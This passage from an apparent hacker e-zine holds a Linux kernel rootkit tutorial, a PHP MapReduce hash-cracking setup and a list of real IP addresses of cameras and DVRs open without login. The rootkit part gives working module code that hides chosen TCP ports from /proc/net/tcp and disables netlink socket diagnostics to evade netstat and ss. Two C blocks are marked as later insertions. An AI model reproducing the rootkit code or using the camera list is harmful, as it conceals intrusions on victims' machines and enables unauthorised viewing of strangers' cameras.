- module_param(proc_fs, charp, 0644);
- module_param(opt_fs, charp, 0644);
- #endif
- It looks as if prior to 2.6.16 there was less convenient syntax available for those developing
- Loadable Kernel Modules (LKMs). At the time of writing this article, the latest stable Linux kernel
- is 2.6.37.1. However, I'll be using gentoo-sources-2.6.37 from the Gentoo portage tree. For the sake
- of consistency, let's double check the current kernel versions:
- $ finger @kernel.org
- [kernel.org]
- The latest linux-next version of the Linux kernel is: next-20110218
- The latest snapshot 2.6 version of the Linux kernel is: 2.6.38-rc5-git5
- The latest mainline 2.6 version of the Linux kernel is: 2.6.38-rc5
- The latest stable 2.6.37 version of the Linux kernel is: 2.6.37.1
- The latest stable 2.6.36 version of the Linux kernel is: 2.6.36.4
- The latest longterm 2.6.35 version of the Linux kernel is: 2.6.35.11
- The latest stable 2.6.35 version of the Linux kernel is: 2.6.35.9
- The latest longterm 2.6.34 version of the Linux kernel is: 2.6.34.8
- The latest stable 2.6.34 version of the Linux kernel is: 2.6.34.7
- The latest longterm 2.6.32 version of the Linux kernel is: 2.6.32.29
- The latest stable 2.6.32 version of the Linux kernel is: 2.6.32.28
- The latest longterm 2.6.27 version of the Linux kernel is: 2.6.27.58
- The latest stable 2.6.27 version of the Linux kernel is: 2.6.27.57
- The latest stable 2.4.37 version of the Linux kernel is: 2.4.37.11
- In 2.6.36, the pointer to the global proc_net structure variable (seen in the adore-ng-0.56 code
- above) disappeared. After grepping around through the kernel source code a bit, I realized that the
- functionality had been so heavily modified that I wasn't sure where to hook into /proc/net/tcp from.
- I was able to grep /boot/System.map for procfs-related symbols and realized it was going to be a lot
- easier than I thought. I found a tcp_proc_register function that allowed me to re-create
- /proc/net/tcp. Also, the proc_net structure that was being referenced by adore-ng had now become
- init_net. So, I simply deleted the existing /proc/net/tcp with proc_net_remove and re-initialized it
- with the address of a custom struct (just to clarify, we are right now working inside the kernel):
- static struct tcp_seq_afinfo tcp4_seq_afinfo = {
- .name = "tcp",
- .family = AF_INET,
- .seq_fops = {.owner = THIS_MODULE},
- .seq_ops = {.show = new_tcp4_seq_show}
- };
- To understand what's going on here, one needs to realize that procfs makes itself appear to userland
- as any other filesystem would. It exposes various functions for operating on the files and
- directories themselves, e.g., open, read, readdir, seek, etc. That's where the new_tcp4_seq_show
- function comes in. The relative pathname to the file where the real tcp4_seq_show is defined is
- net/ipv4/tcp_ipv4.c (as documented by Documentation/networking/proc_net_tcp.txt). The
- new_tcp4_seq_show function is a malicious wrapper which invokes the legitimate tcp4_seq_show
- function, unless it's determined that the TCP connection currently being processed by a read
- operation on /proc/net/tcp corresponds to a port number that is intended to be hidden by the
- rootkit. In that case, new_tcp4_seq_show will not construct the usual hexadecimal-encoded string
- that describes the connection.
- static int (*old_tcp4_seq_show)(struct seq_file *seq, void *v) = 0;
- // The array is zero-terminated so that the loop below can use 0 as its end marker
- static const unsigned short hidden_ports[] = {6666, 7777, 888, 999, 0};
- static int new_tcp4_seq_show(struct seq_file *seq, void *v)
- {
-     /* Let the real tcp4_seq_show append its line to the seq_file buffer first.
-      * NET_LINE (defined elsewhere in the module) is the fixed width of one /proc/net/tcp line. */
-     const signed int retval = old_tcp4_seq_show(seq, v);
-     register unsigned short i = 0;
-     static unsigned int line = 0;
-     auto char hex_port[8] = { 0 }, *offset = seq->buf + seq->count - NET_LINE;
-     if(v == SEQ_START_TOKEN)
-         return line = 0, retval;
-     for(i = 0;hidden_ports[i];i++)
-     {
-         /* Ports appear in the line as ":XXXX" hex; a match retracts the whole line */
-         sprintf(hex_port, ":%04X", hidden_ports[i]);
-         if(strstr(offset, hex_port))
-             return seq->count -= NET_LINE, retval;
-     }
-     /* Renumber the leading "sl" index so that no gap betrays the dropped lines */
-     sprintf(offset, "% 4i", line++);
-     return offset[4] = ':', retval;
- }
- The old_tcp4_seq_show identifier is simply a function pointer to the original tcp4_seq_show
- function, the one assigned to the .seq_ops.show member of the tcp_seq_afinfo structure whose
- definition was shown above. To reiterate, our new_tcp4_seq_show function is wrapping the real
- tcp4_seq_show function. The introduction of our wrapper function into the traditional kernel control
- flow effectively hides certain ports from userland by looping over an array that contains the rogue
- port numbers. In this way, running a command such as netstat will not display the TCP connections
- that have been hidden from /proc/net/tcp.
- The hidden_ports array is specified with the C language keywords "static" and "const." These prevent
- the initialized port numbers from being accessed from outside of the current source file and from
- having the values modified after compilation. Also, the hidden_ports array is defined to be of type
- "unsigned short" because the source and destination port fields in TCP packet headers are non-
- negative and 16 bits wide. Section 3.1 of RFC793 demonstrates this with an ASCII art representation.
- 0 1 2 3
- 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
- +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
- | Source Port | Destination Port |
- +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
- Now, to formally register our new /proc/net/tcp mechanisms, we first remove the original, then pass
- pointers to the data structures representing the /proc/net directory and our new tcp entry within
- it. Simply invoke the appropriate functions when initializing the Loadable Kernel Module. The
- module_init macro tells the compiler which function to execute when using insmod on the compiled .ko
- (kernel object) code file.
- static int __init init_hidetcp(void)
- {
- proc_net_remove(&init_net, "tcp");
- tcp_proc_register(&init_net, &tcp4_seq_afinfo);
- return 0;
- }
- module_init(init_hidetcp);
- Let's go ahead and test it out to make sure everything works. After compiling the rootkit itself
- with GNU make and inserting the module into the kernel, we'll use netstat with the "-tW" command
- line flags so only TCP connections are displayed and the wide display format will allow us to view
- DNS hostnames in their entirety. One of the hidden port numbers we defined in the hidden_ports array
- was 7777 so let's see if netstat detects a connection on that port.
- $ gmake
- $ insmod hidetcp.ko
- $ telnet us.undernet.org 7777
- Trying 208.83.20.130...
- Connected to us.undernet.org
- Escape character is '^]'.
- ^]
- telnet> z
- [1]+ Stopped telnet us.undernet.org 7777
- $ netstat -tW
- Active Internet connections (w/o servers)
- Proto Recv-Q Send-Q Local Address Foreign Address State
- tcp 0 0 alien.localdomain:51889 please.dont.hacktheinter.net:6697 ESTABLISHED
- $
- So far, we've seen how to hide TCP connections to or from certain port numbers from userland
- programs that read from procfs. However, there's another way to access information about TCP
- connections using rtnetlink(3). You can determine if a given program is using procfs or a netlink
- protocol by tracing for the respective function calls.
- $ whatis netlink
- netlink (3) - Netlink macros
- netlink (7) - Communication between kernel and userspace (AF_NETLINK)
- $ strace -fe trace=open,socket netstat -tW 2>&1 > /dev/null | egrep -i '(tcp|netlink)'
- open("/proc/net/tcp", O_RDONLY) = 3
- open("/proc/net/tcp6", O_RDONLY) = -1 ENOENT (No such file or directory)
- $ strace -fe trace=open,socket ./ss 2>&1 > /dev/null | egrep -i '(tcp|netlink)'
- socket(PF_NETLINK, SOCK_RAW, 4) = 3
- The ss binary traced above ships with iproute2 and retrieves socket statistics. Iproute2 has a
- Wikipedia article at http://en.wikipedia.org/wiki/Iproute2 with some helpful links to get you up
- to speed.
- Some have probably noticed that the raw socket call succeeds even though the prompt reflects a
- non-root user. SOCK_RAW only requires CAP_NET_RAW in the PF_INET family; for PF_NETLINK any user
- may open a raw socket, and a socket diagnostics dump needs no privilege at all, so the kernel hands
- back a valid descriptor.
- Please note that rtnetlink isn't the only netlink protocol in existence; there are many more, far
- too many to mention here. A number of academic papers have been published on netlink over the past
- decade or so. One of the latest and most interesting is "Communicating between the kernel and
- user-space in Linux using Netlink sockets" by Ayuso, Gasca and Lefevre. The security-related uses
- it covers alone are broad: detecting and mitigating DDoS attacks, subliminal channels between
- processes with disparate privileges, multicasting a single communications channel to multiple
- system users, implementing a dynamic routing protocol like Open Shortest Path First in userland,
- detecting network interfaces with promiscuous mode enabled, and so on.
- In this particular scenario, only one aspect of netlink matters for the final goal of TCP
- connectivity that's as low-key as possible: connections hidden from /proc/net/tcp can still be
- listed through the netlink socket interface, so another technique is needed to avoid that
- disclosure. Here's another typescript (`man script`) of the ss program from the misc directory in
- iproute2's source tree as it executes on the standard output stream:
- $ ./ss
- State Recv-Q Send-Q Local Address:Port Peer Address:Port
- ESTAB 0 0 192.168.1.100:56921 72.14.204.147:80
- ESTAB 0 0 192.168.1.100:51237 184.27.36.110:22
- In this case, the two TCP sockets listed are both in the established state. The four zero queue
- values mean that, as of this run, the kernel has delivered all pending data to and from each
- socket. The code that answers socket diagnostics queries over NETLINK_INET_DIAG is in
- /usr/src/linux/net/ipv4/inet_diag.c, with /usr/src/linux/include/linux/inet_diag.h as the
- associated header. The TCP-specific handler lives in net/ipv4/tcp_diag.c, which registers itself
- with inet_diag under the TCPDIAG_GETSOCK type. However, we can disable all TCP socket diagnostics
- without touching any of the tcp_diag source: the following short snippet, inserted into the
- rootkit module's initialization function, is sufficient to stop netlink from serving any TCP
- socket queries at all:
- #include <linux/inet_diag.h>
- /* inet_diag_unregister() only reads idiag_type: it clears the table slot for
-    TCPDIAG_GETSOCK, so every TCP diag request now finds no handler. */
- static struct inet_diag_handler h;
- h.idiag_type = TCPDIAG_GETSOCK;
- inet_diag_unregister(&h);
- Now iproute2's ss binary won't output any TCP connections at all, since the handler responsible
- for the message type it sends has been removed and the kernel rejects the request. One caveat: if
- tcp_diag is built as a module and is ever reloaded, its init routine calls inet_diag_register()
- again and the handler comes back.
- It works, but it would be better to allow Internet socket diagnostics only for connections whose
- source and destination port numbers don't match our blacklist. To do that, a full
- inet_diag_handler structure must be filled out and inet_diag_register() invoked with it after the
- original handler has been unregistered (inet_diag_register() refuses a type that is already
- taken), much as the tcp_seq_afinfo structure was passed to tcp_proc_register in the previous
- technique. A brief outline tracing the nested structure members back to the actual port values
- follows; turning the concept into compilable rootkit source is left as an exercise for the reader.
- include/net/inet_sock.h
- 112 struct inet_sock {
- 113 __be16 inet_dport;
- 114 __be16 inet_sport;
- 115 }
- include/net/inet_connection_sock.h
- 86 struct inet_connection_sock {
- 87 /* inet_sock has to be the first member! */
- 88 struct inet_sock icsk_inet;
- include/linux/tcp.h
- 292 struct tcp_sock {
- 293 /* inet_connection_sock has to be the first member of tcp_sock */
- 294 struct inet_connection_sock inet_conn;
- net/ipv4/tcp_diag.c
- 20 static void tcp_diag_get_info(struct sock *sk, struct inet_diag_msg *r,
- 21 void *_info)
- 22 {
- 23 const struct tcp_sock *tp = tcp_sk(sk);
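- As an added illustration (example code written for this edit, not duper's rootkit and not the
- iproute2 or kernel sources), here is the userland side of that exchange in C: the TCPDIAG_GETSOCK
- dump request ss sends over NETLINK_INET_DIAG, a reply constructed in-process from the same
- inet_diag_msg layout the kernel fills in, and the article's port blacklist applied to each record,
- which is exactly the decision a filtering inet_diag handler would make before calling
- inet_diag_fill(). The struct definitions mirror the 2.6-era UAPI headers instead of including them,
- and the hidden_ports contents and the three sample connections are assumptions for the demo.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <arpa/inet.h>

/* Constants and layouts copied from the 2.6-era UAPI headers (linux/netlink.h and
 * linux/inet_diag.h; NETLINK_INET_DIAG is protocol 4 in the strace of ss above) so
 * this builds without kernel headers. No socket is opened: the reply is constructed. */
#define TCPDIAG_GETSOCK   18    /* idiag_type the tcp_diag handler registers under */
#define NLM_F_REQUEST     0x01
#define NLM_F_MULTI       0x02
#define NLM_F_DUMP        0x300 /* NLM_F_ROOT | NLM_F_MATCH */
#define NLMSG_DONE        0x03
#define NLMSG_ALIGN(n)    (((n) + 3u) & ~3u)

struct nl_hdr       { uint32_t len; uint16_t type, flags; uint32_t seq, pid; };
struct idiag_sockid { uint16_t sport, dport; uint32_t src[4], dst[4], ifindex, cookie[2]; };
struct idiag_req    { uint8_t family, src_len, dst_len, ext; struct idiag_sockid id; uint32_t states, dbs; };
struct idiag_msg    { uint8_t family, state, timer, retrans; struct idiag_sockid id;
                      uint32_t expires, rqueue, wqueue, uid, inode; };

/* Same idea as the article's hidden_ports array; these values are assumed. */
static const uint16_t hidden_ports[] = { 7777, 31337 };

static int port_hidden(uint16_t port)
{
    for (size_t i = 0; i < sizeof hidden_ports / sizeof hidden_ports[0]; i++)
        if (hidden_ports[i] == port) return 1;
    return 0;
}

/* The dump request ss sends: nlmsghdr + inet_diag_req, all AF_INET TCP states. */
size_t build_tcpdiag_request(uint8_t *buf, size_t cap)
{
    struct nl_hdr h = { (uint32_t)(sizeof(struct nl_hdr) + sizeof(struct idiag_req)),
                        TCPDIAG_GETSOCK, NLM_F_REQUEST | NLM_F_DUMP, 1, 0 };
    struct idiag_req r = { .family = 2 /* AF_INET */, .states = 0xfff /* every state */ };
    if (cap < h.len) return 0;
    memcpy(buf, &h, sizeof h);
    memcpy(buf + sizeof h, &r, sizeof r);
    return h.len;                       /* 16 + 60 bytes */
}

/* Constructed multi-part reply: one inet_diag_msg per (sport, dport) pair, then
 * NLMSG_DONE, framed the way the kernel frames a dump. Returns bytes written. */
size_t build_sample_reply(uint8_t *buf, size_t cap, const uint16_t (*pairs)[2], int n)
{
    size_t off = 0, rec = NLMSG_ALIGN(sizeof(struct nl_hdr) + sizeof(struct idiag_msg));
    struct nl_hdr done = { (uint32_t)(sizeof(struct nl_hdr) + 4), NLMSG_DONE, NLM_F_MULTI, 1, 0 };
    if (cap < rec * n + NLMSG_ALIGN(done.len)) return 0;
    for (int i = 0; i < n; i++, off += rec) {
        struct nl_hdr h = { (uint32_t)rec, TCPDIAG_GETSOCK, NLM_F_MULTI, 1, 0 };
        struct idiag_msg m = { .family = 2, .state = 1 };   /* AF_INET, TCP_ESTABLISHED */
        m.id.sport = htons(pairs[i][0]);                    /* ports travel in network order */
        m.id.dport = htons(pairs[i][1]);
        memcpy(buf + off, &h, sizeof h);
        memcpy(buf + off + sizeof h, &m, sizeof m);
    }
    memset(buf + off, 0, NLMSG_ALIGN(done.len));
    memcpy(buf + off, &done, sizeof done);
    return off + NLMSG_ALIGN(done.len);
}

/* Walk the dump and drop every record touching a blacklisted port: the decision a
 * filtering inet_diag handler would take before inet_diag_fill(). Returns the count
 * of visible sockets and writes their peer ports to out[]. */
int filter_tcpdiag_dump(const uint8_t *buf, size_t len, uint16_t *out, int max)
{
    int kept = 0;
    for (size_t off = 0; off + sizeof(struct nl_hdr) <= len; ) {
        struct nl_hdr h;
        struct idiag_msg m;
        memcpy(&h, buf + off, sizeof h);
        if (h.len < sizeof h || off + h.len > len || h.type == NLMSG_DONE) break;
        if (h.type == TCPDIAG_GETSOCK && h.len >= sizeof h + sizeof m) {
            memcpy(&m, buf + off + sizeof h, sizeof m);
            if (!port_hidden(ntohs(m.id.sport)) && !port_hidden(ntohs(m.id.dport))) {
                if (kept < max) out[kept] = ntohs(m.id.dport);
                kept++;
            }
        }
        off += NLMSG_ALIGN(h.len);
    }
    return kept;
}

/* Three constructed connections: one to hidden port 7777, one from hidden port 31337.
 * index < 0 gives the visible count; otherwise the index-th visible peer port or -1. */
int demo_visible_dport(int index)
{
    static const uint16_t pairs[][2] = { {51889, 6697}, {45210, 7777}, {31337, 80} };
    uint8_t reply[512];
    uint16_t visible[8];
    size_t n = build_sample_reply(reply, sizeof reply, pairs, 3);
    int kept = filter_tcpdiag_dump(reply, n, visible, 8);
    return index < 0 ? kept : (index < kept ? visible[index] : -1);
}

size_t demo_request_len(void) { uint8_t req[128]; return build_tcpdiag_request(req, sizeof req); }
```

- Against a live kernel the same walk runs over what recvmsg() returns from a PF_NETLINK/SOCK_RAW
- socket opened with protocol 4; comparing that list with /proc/net/tcp is also how a defender spots
- the procfs-only hiding from the first technique, which is why the netlink side has to be covered
- as well.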
- For more information on Linux kernel development, check out:
- - The Linux Kernel Newbies site http://kernelnewbies.org/
- - The linux-kernel mailing list FAQ http://www.tux.org/lkml/
- - The Linux Kernel Hackers' Guide from the Linux Documentation Project
- http://tldp.org/LDP/khg/HyperNews/get/khg.html (highly recommended)
- - And, of course, the main Linux Kernel Archives site http://kernel.org
- [==================================================================================================]
- -=[ 0x08 High Performance Hash Cracking with MapReduce, Part 2
- -=[ Author: elchupathingy
- -=[ IRC: irc.gonullyourself.org #gny
- /----------------------------------------------------------------------------------------
- |
- | Introduction
- |
- The last article covered the basic theory of MapReduce and a few examples of how it can be used.
- The uses of MapReduce are not limited to those mentioned, but they are the easiest for grasping the
- concept of breaking a larger task into pieces and handing those pieces to other nodes. This
- article focuses on the code side of MapReduce instead of the higher-level concepts.
- /----------------------------------------------------------------------------------------
- |
- | Background
- |
- The very basic implementation of MapReduce shown here is something that can be expanded upon
- easily. It provides automatic pre-processing of the input data and automatic post-processing of
- the results. Being a simple implementation, though, some of the mechanics inside the code have
- problems; fixing them is left to someone else. By familiarizing yourself with the algorithm and
- stepping through the code, it should be a trivial matter to end up with a fully functioning
- MapReduce implementation.
- /----------------------------------------------------------------------------------------
- |
- | Theory
- |
- To recap: The idea behind MapReduce is quite simple to grasp, but its layout is detailed and may
- lead to confusion at times. Here is a look at a typical layout of a MapReduce network:
- /----------------------------------------------\
- /------\ | | | | | |
- |Master|----/ /------\ /------\ /------\ /------\ /------\
- \------/ |Mapper| |Mapper| |Mapper| |Mapper| |Mapper|
- \------/ \------/ \------/ \------/ \------/
- | | | | |
- | | | | |
- /-------\ /-------\ /-------\ /-------\ /-------\
- |Reducer| |Reducer| |Reducer| |Reducer| |Reducer|
- \-------/ \-------/ \-------/ \-------/ \-------/
- | | | | |
- \ \ | / /
- \ \ | / /
- \ \ | / /
- \ \ | / /
- \ \ | / /
- \ \ | / /
- \ \ | / /
- \ \ | / /
- \ \ | / /
- \ \|/ /
- \ | /
- \-----------------/
- |
- /---------\
- |Answer!!!|
- \---------/
- Now that's a picture. This network layout has two key characteristics to it:
- 1) Series of Mappers
- 2) Series of Reducers
- These two things are the meat of the MapReduce concept. Now, what exactly is MapReduce? It's
- formally defined as the following:
- /------------------------------------------------------------------------------------
- |MapReduce is a framework for processing huge datasets on certain kinds of
- |distributable problems using a large number of computers (nodes), collectively
- |referred to as a cluster. Computational processing can occur on data stored either
- |in a filesystem (unstructured) or within a database (structured).
- | - Wikipedia
- Now that that's out of the way, let's move on to real code and see how this works in the given
- implementation.
- Firstly, what software is providing the backend infrastructure?
- The implementation relies on the following:
- Web server: Apache or whatever you have as long as it supports PHP.
- MySQL
- That's it. The clients run from php-cli but can also be called by the web server if desired.
- The MySQL tables that the scripts interact with are very simple:
- /------------------------------------------------------------------------------------
- | CREATE TABLE IF NOT EXISTS `node` (
- | `id` varchar(32) NOT NULL,
- | `type` int(11) NOT NULL,
- | `job_id` varchar(32) NOT NULL,
- | `last_connect` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
- | UNIQUE KEY `id` (`id`)
- | ) ENGINE=MyISAM DEFAULT CHARSET=latin1;
- |
- | CREATE TABLE IF NOT EXISTS `job` (
- | `id` varchar(32) NOT NULL,
- | `status` int(11) NOT NULL,
- | `time_added` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
- | `mappers` int(11) NOT NULL,
- | `reducers` int(11) NOT NULL,
- | `time_started` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
- | PRIMARY KEY (`id`)
- | ) ENGINE=MyISAM DEFAULT CHARSET=latin1;
- |
- These tables provide the necessary framework for this implementation while demonstrating the
- MapReduce structure in an obvious yet functional manner. Should MapReduce be used in a production
- environment, a more efficient, properly designed framework should be used, and a high-performance
- application should most likely not be written in an interpreted language.
- Obviously, these tables are of no use without the scripts that interact with the database. The
- main script that facilitates this interaction is 'stat.php'. It is the channel through which the
- nodes talk to the master: it keeps track of each node's last connect time and assigns each node
- the role of either 'mapper' or 'reducer'. The code is straightforward, and the source should be
- relatively self-explanatory on a read-through. The next step is to determine how data is relayed
- between master and node. The data is structured as EL markup, which looks suspiciously similar to
- existing markup languages like HTML and XML:
- /------------------------------------------------------------------------------------
- | <EL>
- | <id>ec366edc8a513f467af89f2e5cd9f37a</id>
- | <type>SET</type>
- | <payload name="job_id">
- | 85103e20ac8441af181b15f58fc53b08
- | </payload>
- | </EL>
- |
- The "id" tag contains the ID of the node. The "type" tag tells the node to perform a specific
- action, in this case, to set its "job_id" to the payload. The "payload" tag holds the data that
- will be assigned to a variable stored on the node. It is named such that the variable is assigned
- correctly. In this particular packet, the information between the opening and closing "payload"
- tags is an MD5 hash, though it does not always have to be. However, protocol defines that the
- payload must only be alphanumeric (only contains numbers or letters). If the "type" tag is set to
- "FILE", then the payload should be treated as Base64-encoded data. This protocol is simple but
- allows for easy parsing and greater flexibility.
- Here is an example handshake performed between node and master. This handshake is initiated by
- a node upon startup to seek new jobs:
- /---------------------------------------------------------------------------------------------\
- |http://127.0.0.1/map_reduce_zine/stat.php?id=ec366edc8a513f467af89f2e5cd9f37a&status=starting|
- \---------------------------------------------------------------------------------------------/
- |
- |
- /-------------------------------------------------\
- | <EL> |
- | <id>ec366edc8a513f467af89f2e5cd9f37a</id> |
- | <type>REQUEST</type> |-----------------------\
- | </EL> | |
- \-------------------------------------------------/ |
- |
- |
- /--------------------------------------------------------------------------------------------\
- |http://127.0.0.1/map_reduce_zine/stat.php?id=ec366edc8a513f467af89f2e5cd9f37a&status=whatami|
- \--------------------------------------------------------------------------------------------/
- |
- |
- /-------------------------------------------------\
- | <EL> |
- | <id>ec366edc8a513f467af89f2e5cd9f37a</id> |
- | <type>SET</type> |
- | <payload name="type"> |
- | reducer |-----------------------\
- | </payload> | |
- | </EL> | |
- \-------------------------------------------------/ |
- |
- |
- /--------------------------------------------------------------------------------------------\
- |http://127.0.0.1/map_reduce_zine/stat.php?id=ec366edc8a513f467af89f2e5cd9f37a&status=looking|
- \--------------------------------------------------------------------------------------------/
- |
- |
- /-------------------------------------------------\
- | <EL> |
- | <id>ec366edc8a513f467af89f2e5cd9f37a</id> |
- | <type>SET</type> |
- | <payload name="job_id"> |
- | 85103e20ac8441af181b15f58fc53b08 |
- | </payload> |
- | </EL> |
- \-------------------------------------------------/
- Once the node has received a job, it sends another request to the master for the script and
- data files. The job files, which contain the split-up work, are stored in a folder specific to
- that job_id. To hand out job files from that folder, the following script is used:
- /------------------------------------------------------------------------------------
- |#job_chunks.php
- |# $id (node id) and $job_id are assumed to have been taken from the node's request
- |# earlier in the script; both should be checked against /^[0-9a-f]{32}$/ before
- |# being used in a path.
- |$dir = opendir( "./chunks/$job_id" );
- |
- |if( $dir )
- |{
- |    # Skip "." and ".." and stop at the first real entry.
- |    do
- |    {
- |        $thing = readdir( $dir );
- |
- |        if( $thing === false )            # no entries left: the job directory is exhausted
- |        {
- |            closedir( $dir );
- |            rmdir( "./chunks/$job_id" );  # was "$jobs_id", an undefined variable
- |            die;
- |        }
- |
- |        if( $thing == "." || $thing == ".." )
- |            continue;
- |        else
- |            break;
- |
- |    }while( true );
- |
- |    if( $thing !== false && $thing != "." && $thing != ".." )
- |    {
- |        # Read, then delete: two nodes can reach this point with the same $thing
- |        # before either unlink() runs, which is the duplicate-chunk issue noted below.
- |        $output = "<EL>\r\n";
- |        $output .= "\t<id>$id</id>\r\n";
- |        $output .= "\t<type>FILE</type>\r\n";
- |        $output .= "\t<payload name=\"chunk\">\r\n";
- |        $output .= "\t\t".base64_encode( file_get_contents( "./chunks/$job_id/$thing" ) )."\r\n";
- |        $output .= "\t</payload>\r\n";
- |        $output .= "</EL>";
- |        unlink( "./chunks/$job_id/$thing" );
- |        closedir( $dir );
- |        echo $output;
- |    }
- |}
- |
- This code grabs the next chunk from the directory and wraps it as a EL packet, where the output
- is then sent to the node.
- From here, mapper nodes will process this chunk of data and start a small, one-time use web
- server. The reducer nodes request the IP:PORT of a mapper node, grabbing the result. After doing
- so, they further process the data and upload their results to the master.
- The master does a final reduction step on the reduced results and produces a final, usable
- result that is downloaded by the administrator.
- Although very much functional, the implementation that is given with this article has a few
- inherent issues:
- 1) If a node does not complete a job, that node's results are lost.
- 2) There is no redundancy of nodes.
- 3) The code as a whole was not written with security in mind. Testing should only be
- performed on a private network.
- 4) It uses HTTP to transfer messages, which makes the code easy to write in exchange for
- introducing an enormous amount of overhead.
- 5) Speed gains from distributing the cracking process among multiple nodes are negated by the
- fact that nodes request chunks more quickly than other nodes are able to download them,
- resulting in multiple nodes receiving the same chunk. Requesting a chunk is not a
- "blocking" operation, and the read-then-unlink in job_chunks.php is not atomic. This resulted
- in a dirty code hack using random sleep times.
- With that being said, this project still serves as a good learning tool to those interested in
- the MapReduce algorithm.
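- The duplicate hand-out behind issue 5 comes from job_chunks.php reading a chunk and unlinking it as
- two separate steps, so two nodes polling at once can both be served the same file. The fix is to
- make the claim itself atomic, and the standard primitive for that is rename(2): only one caller can
- succeed in renaming a given path. The block below is an added example written for this edit in C
- (it is not code from the article's MapReduce package); PHP's rename() wraps the same system call,
- so the pattern transfers directly to job_chunks.php. The chunk names, node ids and the /tmp working
- directory are constructed for the demo.

```c
#include <dirent.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* A claimed chunk is renamed to <chunk>.claimed.<node_id> in the same job directory;
 * anything without the tag is still up for grabs. */
#define CLAIM_TAG ".claimed."

/* Try to claim one chunk in dir for node_id. Returns 1 and copies the claimed path
 * into out on success, 0 if no unclaimed chunk is left, -1 on error. Losing the
 * rename race (ENOENT) is normal: another node took that chunk, so move on to the
 * next entry instead of serving a duplicate. */
int claim_chunk(const char *dir, const char *node_id, char *out, size_t cap)
{
    DIR *d = opendir(dir);
    struct dirent *e;
    if (!d) return -1;
    while ((e = readdir(d)) != NULL) {
        char from[512], to[512];
        if (!strcmp(e->d_name, ".") || !strcmp(e->d_name, "..")) continue;
        if (strstr(e->d_name, CLAIM_TAG)) continue;   /* already owned by some node */
        snprintf(from, sizeof from, "%s/%s", dir, e->d_name);
        snprintf(to, sizeof to, "%s/%s" CLAIM_TAG "%s", dir, e->d_name, node_id);
        if (rename(from, to) == 0) {                  /* atomic: exactly one winner */
            closedir(d);
            snprintf(out, cap, "%s", to);
            return 1;
        }
        if (errno != ENOENT) { closedir(d); return -1; }
    }
    closedir(d);
    return 0;
}

/* Demo on constructed data: three chunk files, four nodes claiming in turn.
 * Returns the number of successful claims, or -1 if any chunk was handed out twice
 * (which the rename-based claim makes impossible). */
int demo_claims(void)
{
    const char *nodes[] = { "nodeA", "nodeB", "nodeC", "nodeD" };
    char dir[64], got[4][512];
    int ok = 0;
    snprintf(dir, sizeof dir, "/tmp/chunks.%ld", (long)getpid());
    if (mkdir(dir, 0700) != 0 && errno != EEXIST) return -1;
    for (int i = 0; i < 3; i++) {                     /* constructed wordlist pieces */
        char p[512];
        FILE *f;
        snprintf(p, sizeof p, "%s/chunk%d", dir, i);
        if ((f = fopen(p, "w")) == NULL) return -1;
        fprintf(f, "candidate%d\n", i);
        fclose(f);
    }
    for (int i = 0; i < 4; i++) {
        int r = claim_chunk(dir, nodes[i], got[ok], sizeof got[ok]);
        if (r < 0) return -1;
        if (r == 0) break;                            /* nothing left for the fourth node */
        for (int j = 0; j < ok; j++)
            if (!strcmp(got[j], got[ok])) return -1;  /* duplicate hand-out */
        ok++;
    }
    for (int i = 0; i < ok; i++) unlink(got[i]);      /* clean up the demo directory */
    rmdir(dir);
    return ok;
}

int main(void)
{
    printf("chunks claimed without duplicates: %d\n", demo_claims());
    return 0;
}
```

- With the claim atomic, the random sleeps are no longer needed, and a node that dies mid-job leaves
- a tagged file behind that the master can hand back out (issue 1) by stripping the tag, again with
- a rename.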
- Download the source package for this article:
- http://www.gonullyourself.org/zine/4/MapReduce.tar.gz
- MD5sum: d985ffa4b2fcd63d2a6275697acf252e
- SHA1sum: fb798594216e87b51fd194db1a31e580ebe47a7d
- A few things need to be done before testing this code. First, the config.ini files should be
- updated to point to the URL of your web server and the folder the MapReduce code is installed in.
- The default is "http://127.0.0.1/map_reduce_zine". Once the configs have been updated, the nodes
- are ready to run; however, the master must be set up first. Import and create the tables in
- map_reduce.sql. To make sure the master runs without permission problems, the lazy route is to
- chmod 777 all the directories; that is acceptable for a throwaway test on a private network and
- nowhere else. Now all the configuration is complete. To test the MapReduce cluster, start two or
- more nodes locally by running the "client.php" file in each of the "testing" folders. Once they
- are running, they will begin to poll the master for work.
- To add a job to the cluster, navigate to "add_job.php" in your browser. From there, add the
- corresponding files from the "example" directory. Once a job is added, the nodes automatically
- grab the work script and any data needed to perform the job. Once the nodes are done with their
- work, they begin to poll for new jobs. The example script and data recover the plaintext string
- "elchupathingy" from the hash in "node_script.php". To see whether it worked, browse to
- "show_results.php" and select the link there; it runs the "post-process" script and, in this
- case, displays the plaintext.
- lata, ELChupathingy
- [==================================================================================================]
- -=[ 0x09 Camera/DVR Scan
- -=[ Author: storm
- -=[ Email: storm@gonullyourself.org
- -=[ Website: http://gonullyourself.org/
- Oh, the joys of nmap.
- Open access (no login)
- ----------------------
- http://165.98.238.72/view/index.shtml
- http://165.98.238.75/view/index.shtml
- http://165.98.238.78/view/index.shtml
- http://186.1.14.117/view/index.shtml
- http://24.1.5.61:8082/Simple/index.htm
- http://24.1.10.154:81/
- http://24.1.12.248:1028/
- http://24.1.26.48/img/main.cgi?next_file=main.htm
- http://72.250.135.252:1024/img/image.cgi?next_file=main_fs.htm
- http://74.237.69.5/main.cgi?next_file=main.htm
- http://83.227.138.166/main.cgi?next_file=main.htm
- http://75.61.194.41:1024/main.cgi?next_file=index_in.htm
- http://193.87.102.25/img/main.cgi?next_file=main.htm
- http://213.198.245.70/img/main.cgi?next_file=main.htm
- http://74.237.69.5/main.cgi?next_file=main2.htm
- http://pineairewebcam.dyndns.org/
- http://217.159.181.99/
- http://193.138.213.166/
- http://72.2.138.209:81/
- http://ajs01.dyndns.org/
- http://62.106.98.204/
- http://80.54.239.234/
